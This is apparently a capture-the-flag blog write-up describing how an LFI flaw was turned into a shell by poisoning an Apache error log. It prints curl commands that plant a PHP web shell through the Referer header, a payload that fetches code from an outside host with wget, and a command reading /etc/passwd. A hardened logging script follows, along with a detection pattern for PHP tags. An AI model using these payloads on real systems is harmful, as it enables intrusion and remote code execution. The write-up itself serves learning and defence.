Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge. I found one of the pages vulnerable to SQL Injection, injected it, extracted the admin's credentials, and as soon as I logged into the "Admin Panel" I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that, but they weren't working or weren't there. 🙁 ..

The only thing I hadn't tried was LFI log file poisoning, but it was time to unchain the beast ..
I included the Apache HTTP configuration file and looked for the error/access log. Interestingly, instead of a path to a .log file, I found a piped bash script ..

Me likey 🙂 .. Then, of course, I included the bash script. This was its contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

# Read error-log lines piped in by Apache on stdin, one per iteration.
while : ; do
    read line
    [ -z "$line" ] && exit

    # Pull the vhost name out of a "[host:example.com]" prefix, if present.
    DOMAIN=""
    if [[ "$line" =~ \[host:([^\]]+) ]]; then
        DOMAIN=${BASH_REMATCH[1]}
    fi

    if [ -n "$DOMAIN" ]; then
        # Per-vhost log, written inside that vhost's own web root.
        echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
        chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
    else
        # No vhost tag: fall back to a shared log, also under the web root.
        echo "${line}" >> /var/www/html/error_${DATE}.log
        chown apache:apache /var/www/html/error_${DATE}.log
    fi
done

What does this do? It creates a .log file in "/var/www/html/domain.tld/logs/" named "error_YYYY-MM-DD.log". According to the Apache config, the URL, Referer and time of each error were sent to this bash script, which then saved them to that file .. So I just had to visit a non-existent page *to get a 404* with my Referer set to "<?php system('wget http://x.com/y.txt -O z.php'); ?>" or any of its equivalents .. and then include the .log file to execute the code 😉

curl -e "<?php system($_POST['x']) ?>" http://domain.tld/blablabla.ext

curl --data "x=cat /etc/passwd" "http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log"

I guess we’re done here 😀
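The piped log script above is what made this work: it writes attacker-influenced log lines into the web root, into a directory named after an unvalidated request value, which a later include happily executes. As an added example (not the challenge's script, and not part of the original post), here is a hardened POSIX sh rewrite that keeps logs under an assumed /var/log/httpd/vhosts outside any DocumentRoot, checks the vhost name before using it as a path component, and flags lines carrying a PHP open tag so a poisoning attempt lands in syslog; the --serve flag and the errlog-pipe tag are assumptions too.

```shell
#!/bin/sh
# Hardened rewrite of the piped error-log writer above (added example, not the
# challenge's script). LOG_ROOT is assumed to sit outside every DocumentRoot.
LOG_ROOT="/var/log/httpd/vhosts"
# Print the vhost name from a "[host:example.com] ..." prefix, or nothing if it
# is missing or not a plain DNS-style name (no slashes, no "..", no leading dot),
# so a crafted Host header cannot steer the write path.
safe_domain() {
  domain=""
  case "$1" in
    "[host:"*"]"*) rest="${1#*host:}"; domain="${rest%%]*}" ;;
  esac
  case "$domain" in
    ""|*[!A-Za-z0-9.-]*|.*|*..*) return 0 ;;
  esac
  printf '%s\n' "$domain"
}

# Resolve where a line is appended: always under LOG_ROOT, never the web root.
log_path() {
  domain="$(safe_domain "$1")"
  if [ -n "$domain" ]; then
    printf '%s/%s/error_%s.log\n' "$LOG_ROOT" "$domain" "$2"
  else
    printf '%s/error_%s.log\n' "$LOG_ROOT" "$2"
  fi
}
# A PHP open tag in a log line is inert once logs live outside the web root,
# but it still marks a poisoning attempt worth alerting on.
looks_poisoned() {
  case "$1" in
    *'<?php'*|*'<?='*) return 0 ;;
    *) return 1 ;;
  esac
}

main() {
  date="$(date +%Y-%m-%d)"
  while IFS= read -r line; do
    path="$(log_path "$line" "$date")"
    mkdir -p "$(dirname "$path")"
    case "$line" in "[host:"*"] "*) line="${line#*] }" ;; esac
    printf '%s\n' "$line" >> "$path"
    looks_poisoned "$line" && logger -t errlog-pipe "possible log poisoning in $path"
  done
}

# Assumed Apache wiring: ErrorLog "|/usr/local/sbin/errlog-pipe --serve"
if [ "${1:-}" = "--serve" ]; then main; fi
```

Even with this in place the LFI itself still needs fixing; moving logs out of the web root and validating the path only removes this particular write-then-include route.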

ps: after solving the challenge I found out the "official solution" was nothing like this; it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to successfully bypass that function plus the other image re-sizing functions .. there are various great articles written on that topic; here are some of them ..
